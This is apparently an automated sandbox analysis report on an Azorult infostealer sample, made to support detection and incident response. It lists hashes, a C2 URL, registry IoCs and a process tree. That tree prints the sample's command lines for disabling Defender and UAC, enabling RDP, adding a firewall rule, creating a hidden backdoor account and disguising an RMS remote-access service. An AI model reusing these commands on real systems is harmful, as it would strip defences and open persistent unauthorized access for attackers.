azorult | dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360

Analysis

max time kernel
35s
max time network
54s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
25-02-2024 21:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Azorult[1].exe
Size

10.0MB
MD5

5df0cf8b8aa7e56884f71da3720fb2c6
SHA1

0610e911ade5d666a45b41f771903170af58a05a
SHA256

dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360
SHA512

724ce5e285c0ec68464c39292be62b80124909e98a6f1cd4a8ddee9de24b9583112012200bf10261354de478d77a5844cb843673235db3f704a307976164669a
SSDEEP

196608:NjIrZDbMLq8TKqTNNRYWzmf1e4Qx/PMPTZPkTGX9sqiL/aVvTA:N2Z4DRYWXdaZPGy9sJL/aVv

Score

10^/10

azorult rms aspackv2 discovery evasion infostealer persistence rat trojan upx

Malware Config

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

Azorult[1].exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult[1].exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult[1].exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult[1].exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult[1].exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult[1].exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

regedit.exeAzorult[1].exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult[1].exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult[1].exe

Windows security bypass 2 TTPs 1 IoCs
evasion trojan

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

regedit.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

evasion

Processes:

Azorult[1].exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult[1].exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult[1].exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult[1].exe

Modifies Windows Firewall 2 TTPs 22 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
1800	netsh.exe
1992	netsh.exe
324	netsh.exe
1020	netsh.exe
2608	netsh.exe
1636	netsh.exe
2044	netsh.exe
1884	netsh.exe
2024	netsh.exe
888	netsh.exe
2900	netsh.exe
768	netsh.exe
2188	netsh.exe
2112	netsh.exe
2840	netsh.exe
2068	netsh.exe
2660	netsh.exe
1548	netsh.exe
2120	netsh.exe
1440	netsh.exe
2112	netsh.exe
952	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	acprotect
C:\ProgramData\Windows\vp8decoder.dll	acprotect

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
\ProgramData\Windows\rutserv.exe	aspack_v212_v242
C:\ProgramData\Windows\rutserv.exe	aspack_v212_v242
\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242
C:\ProgramData\Windows\rfusclient.exe	aspack_v212_v242

Executes dropped EXE 17 IoCs

Processes:

wini.exewinit.execheat.exerutserv.exetaskhost.exeink.exeP.exeicacls.execonhost.exerutserv.exerfusclient.exerfusclient.execonhost.exewinlog.execmd.exetaskhostw.exerfusclient.exe

pid	process
2564	wini.exe
2288	winit.exe
1840	cheat.exe
1928	rutserv.exe
2076	taskhost.exe
940	ink.exe
284	P.exe
3056	icacls.exe
1440	conhost.exe
1724	rutserv.exe
2324	rfusclient.exe
1124	rfusclient.exe
1592	conhost.exe
1632	winlog.exe
2224	cmd.exe
1932	taskhostw.exe
1452	rfusclient.exe

Loads dropped DLL 21 IoCs

Processes:

Azorult[1].exewini.execmd.exetaskhost.exerutserv.exewinlog.exe

pid	process
2804	Azorult[1].exe
2564	wini.exe
2564	wini.exe
2564	wini.exe
2564	wini.exe
2804	Azorult[1].exe
2360	cmd.exe
1840
1840
1840
1840
2804	Azorult[1].exe
2804	Azorult[1].exe
2076	taskhost.exe
1724	rutserv.exe
2076	taskhost.exe
2076	taskhost.exe
1632	winlog.exe
1632	winlog.exe
1632	winlog.exe
2076	taskhost.exe

Modifies file permissions 1 TTPs 47 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
2828	icacls.exe
488	icacls.exe
1092	icacls.exe
2984	icacls.exe
292	icacls.exe
2604	icacls.exe
2408	icacls.exe
2668	icacls.exe
1560	icacls.exe
2248	icacls.exe
2808	icacls.exe
2168	icacls.exe
580	icacls.exe
736	icacls.exe
1952	icacls.exe
1036	icacls.exe
1592	icacls.exe
2128	icacls.exe
2876	icacls.exe
904	icacls.exe
1740	icacls.exe
1152	icacls.exe
780	icacls.exe
2168	icacls.exe
2028	icacls.exe
948	icacls.exe
1720	icacls.exe
2000	icacls.exe
2084	icacls.exe
1604	icacls.exe
2744	icacls.exe
952	icacls.exe
804	icacls.exe
2236	icacls.exe
1956	icacls.exe
1992	icacls.exe
2772	icacls.exe
952	icacls.exe
2216	icacls.exe
2784	icacls.exe
1732	icacls.exe
1848	icacls.exe
2120	icacls.exe
3056	icacls.exe
904	icacls.exe
2360	icacls.exe
1620	icacls.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\Windows\vp8encoder.dll	upx
C:\ProgramData\Windows\vp8decoder.dll	upx
\ProgramData\Microsoft\Intel\winlogon.exe	upx
behavioral1/memory/1632-216-0x00000000032F0000-0x0000000003309000-memory.dmp	upx
behavioral1/memory/1632-221-0x00000000032F0000-0x0000000003309000-memory.dmp	upx
behavioral1/memory/2224-224-0x0000000000400000-0x0000000000419000-memory.dmp	upx
C:\ProgramData\WindowsTask\winlogon.exe	upx
behavioral1/memory/1848-300-0x00000000008B0000-0x000000000099C000-memory.dmp	upx
behavioral1/memory/2224-303-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/1848-334-0x00000000008B0000-0x000000000099C000-memory.dmp	upx
behavioral1/memory/2224-341-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Azorult[1].exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult[1].exe

Modifies WinLogon 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Azorult[1].exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult[1].exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult[1].exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult[1].exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult[1].exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult[1].exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult[1].exe

AutoIT Executable 14 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
\ProgramData\Windows\winit.exe	autoit_exe
\ProgramData\Windows\winit.exe	autoit_exe
\ProgramData\Windows\winit.exe	autoit_exe
\ProgramData\Windows\winit.exe	autoit_exe
C:\ProgramData\Windows\winit.exe	autoit_exe
\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe
\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe
\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe
\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe
C:\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe
\ProgramData\RealtekHD\taskhostw.exe	autoit_exe
C:\Programdata\RealtekHD\taskhostw.exe	autoit_exe
behavioral1/memory/1848-300-0x00000000008B0000-0x000000000099C000-memory.dmp	autoit_exe
behavioral1/memory/1848-334-0x00000000008B0000-0x000000000099C000-memory.dmp	autoit_exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
2924	sc.exe
1748	sc.exe
1324	sc.exe
1568	sc.exe
436	sc.exe
2648	sc.exe
2436	sc.exe
1296	sc.exe
2928	sc.exe
780	sc.exe
2984	sc.exe
596	sc.exe
2064	sc.exe
1952	sc.exe
3000	sc.exe
2464	sc.exe
1956	sc.exe
2784	sc.exe
1272	sc.exe
1876	sc.exe
1688	sc.exe
2956	sc.exe
2652	sc.exe
2536	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2236 schtasks.exe
2748 schtasks.exe
Delays execution with timeout.exe 6 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

2136 timeout.exe
1836 timeout.exe
2508 timeout.exe
2840 timeout.exe
2368 timeout.exe
2740 timeout.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

2228 ipconfig.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1672 taskkill.exe
2600 taskkill.exe
960 taskkill.exe
2748 taskkill.exe
Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

2432 regedit.exe
1044 regedit.exe
Runs net.exe

pid	process
2236	schtasks.exe
2748	schtasks.exe

pid	process
2136	timeout.exe
1836	timeout.exe
2508	timeout.exe
2840	timeout.exe
2368	timeout.exe
2740	timeout.exe

pid	process
2228	ipconfig.exe

pid	process
1672	taskkill.exe
2600	taskkill.exe
960	taskkill.exe
2748	taskkill.exe

pid	process
2432	regedit.exe
1044	regedit.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

Azorult[1].exerutserv.exeicacls.execonhost.exerutserv.exerfusclient.exe

pid	process
2804	Azorult[1].exe
2804	Azorult[1].exe
2804	Azorult[1].exe
2804	Azorult[1].exe
2804	Azorult[1].exe
1928	rutserv.exe
1928	rutserv.exe
1928	rutserv.exe
1928	rutserv.exe
3056	icacls.exe
3056	icacls.exe
1440	conhost.exe
1440	conhost.exe
1724	rutserv.exe
1724	rutserv.exe
1724	rutserv.exe
1724	rutserv.exe
2324	rfusclient.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468

pid	process
468

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

rutserv.execonhost.exerutserv.exe

description	pid	process
Token: SeDebugPrivilege	1928	rutserv.exe
Token: SeDebugPrivilege	1440	conhost.exe
Token: SeTakeOwnershipPrivilege	1724	rutserv.exe
Token: SeTcbPrivilege	1724	rutserv.exe
Token: SeTcbPrivilege	1724	rutserv.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

rutserv.exeicacls.execonhost.exerutserv.exe

pid process

1928 rutserv.exe
3056 icacls.exe
1440 conhost.exe
1724 rutserv.exe

pid	process
1928	rutserv.exe
3056	icacls.exe
1440	conhost.exe
1724	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Azorult[1].exewini.exeWScript.execmd.exetaskhost.execmd.exe

description	pid	process	target process
PID 2804 wrote to memory of 2564	2804	Azorult[1].exe	wini.exe
PID 2804 wrote to memory of 2564	2804	Azorult[1].exe	wini.exe
PID 2804 wrote to memory of 2564	2804	Azorult[1].exe	wini.exe
PID 2804 wrote to memory of 2564	2804	Azorult[1].exe	wini.exe
PID 2564 wrote to memory of 268	2564	wini.exe	WScript.exe
PID 2564 wrote to memory of 268	2564	wini.exe	WScript.exe
PID 2564 wrote to memory of 268	2564	wini.exe	WScript.exe
PID 2564 wrote to memory of 268	2564	wini.exe	WScript.exe
PID 2564 wrote to memory of 2288	2564	wini.exe	winit.exe
PID 2564 wrote to memory of 2288	2564	wini.exe	winit.exe
PID 2564 wrote to memory of 2288	2564	wini.exe	winit.exe
PID 2564 wrote to memory of 2288	2564	wini.exe	winit.exe
PID 268 wrote to memory of 2360	268	WScript.exe	cmd.exe
PID 268 wrote to memory of 2360	268	WScript.exe	cmd.exe
PID 268 wrote to memory of 2360	268	WScript.exe	cmd.exe
PID 268 wrote to memory of 2360	268	WScript.exe	cmd.exe
PID 268 wrote to memory of 2360	268	WScript.exe	cmd.exe
PID 268 wrote to memory of 2360	268	WScript.exe	cmd.exe
PID 268 wrote to memory of 2360	268	WScript.exe	cmd.exe
PID 2360 wrote to memory of 2432	2360	cmd.exe	regedit.exe
PID 2360 wrote to memory of 2432	2360	cmd.exe	regedit.exe
PID 2360 wrote to memory of 2432	2360	cmd.exe	regedit.exe
PID 2360 wrote to memory of 2432	2360	cmd.exe	regedit.exe
PID 2360 wrote to memory of 1044	2360	cmd.exe	regedit.exe
PID 2360 wrote to memory of 1044	2360	cmd.exe	regedit.exe
PID 2360 wrote to memory of 1044	2360	cmd.exe	regedit.exe
PID 2360 wrote to memory of 1044	2360	cmd.exe	regedit.exe
PID 2360 wrote to memory of 1836	2360	cmd.exe	timeout.exe
PID 2360 wrote to memory of 1836	2360	cmd.exe	timeout.exe
PID 2360 wrote to memory of 1836	2360	cmd.exe	timeout.exe
PID 2360 wrote to memory of 1836	2360	cmd.exe	timeout.exe
PID 2804 wrote to memory of 1840	2804	Azorult[1].exe	cheat.exe
PID 2804 wrote to memory of 1840	2804	Azorult[1].exe	cheat.exe
PID 2804 wrote to memory of 1840	2804	Azorult[1].exe	cheat.exe
PID 2804 wrote to memory of 1840	2804	Azorult[1].exe	cheat.exe
PID 2360 wrote to memory of 1928	2360	cmd.exe	rutserv.exe
PID 2360 wrote to memory of 1928	2360	cmd.exe	rutserv.exe
PID 2360 wrote to memory of 1928	2360	cmd.exe	rutserv.exe
PID 2360 wrote to memory of 1928	2360	cmd.exe	rutserv.exe
PID 1840 wrote to memory of 2076	1840		taskhost.exe
PID 1840 wrote to memory of 2076	1840		taskhost.exe
PID 1840 wrote to memory of 2076	1840		taskhost.exe
PID 1840 wrote to memory of 2076	1840		taskhost.exe
PID 2804 wrote to memory of 940	2804	Azorult[1].exe	ink.exe
PID 2804 wrote to memory of 940	2804	Azorult[1].exe	ink.exe
PID 2804 wrote to memory of 940	2804	Azorult[1].exe	ink.exe
PID 2804 wrote to memory of 940	2804	Azorult[1].exe	ink.exe
PID 2804 wrote to memory of 1820	2804	Azorult[1].exe	cmd.exe
PID 2804 wrote to memory of 1820	2804	Azorult[1].exe	cmd.exe
PID 2804 wrote to memory of 1820	2804	Azorult[1].exe	cmd.exe
PID 2804 wrote to memory of 1820	2804	Azorult[1].exe	cmd.exe
PID 2076 wrote to memory of 284	2076	taskhost.exe	P.exe
PID 2076 wrote to memory of 284	2076	taskhost.exe	P.exe
PID 2076 wrote to memory of 284	2076	taskhost.exe	P.exe
PID 2076 wrote to memory of 284	2076	taskhost.exe	P.exe
PID 2076 wrote to memory of 284	2076	taskhost.exe	P.exe
PID 2076 wrote to memory of 284	2076	taskhost.exe	P.exe
PID 2076 wrote to memory of 284	2076	taskhost.exe	P.exe
PID 1820 wrote to memory of 436	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 436	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 436	1820	cmd.exe	sc.exe
PID 1820 wrote to memory of 436	1820	cmd.exe	sc.exe
PID 2804 wrote to memory of 1788	2804	Azorult[1].exe	cmd.exe
PID 2804 wrote to memory of 1788	2804	Azorult[1].exe	cmd.exe

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

Processes:

Azorult[1].exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult[1].exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult[1].exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult[1].exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

2852 attrib.exe
2668 attrib.exe

pid	process
2852	attrib.exe
2668	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Azorult[1].exe
"C:\Users\Admin\AppData\Local\Temp\Azorult[1].exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Loads dropped DLL
- Checks whether UAC is enabled
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2804
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2564
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:268
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        UAC bypass
        Windows security bypass
        Runs .reg file with regedit
        
        PID:2432
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:1044
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:1836
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1928
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        
        PID:3056
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        
        PID:1440
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:2852
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:2668
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:1568
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:2064
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:2984
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    PID:2288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
      4⤵
      PID:1760
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  PID:1840
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      Executes dropped EXE
      PID:284
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      PID:1592
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:2600
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\rdp\pause.bat" "
        6⤵
        
        PID:812
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:1672
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:2600
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:2508
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:2300
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        
        PID:920
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:960
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:2368
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:2136
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:1036
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        Modifies Windows Firewall
        
        PID:2112
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:668
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:1324
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1632
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        
        PID:2224
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C774.tmp\C775.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:2288
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Executes dropped EXE
      PID:1932
    - - C:\Programdata\WindowsTask\winlogon.exe
        
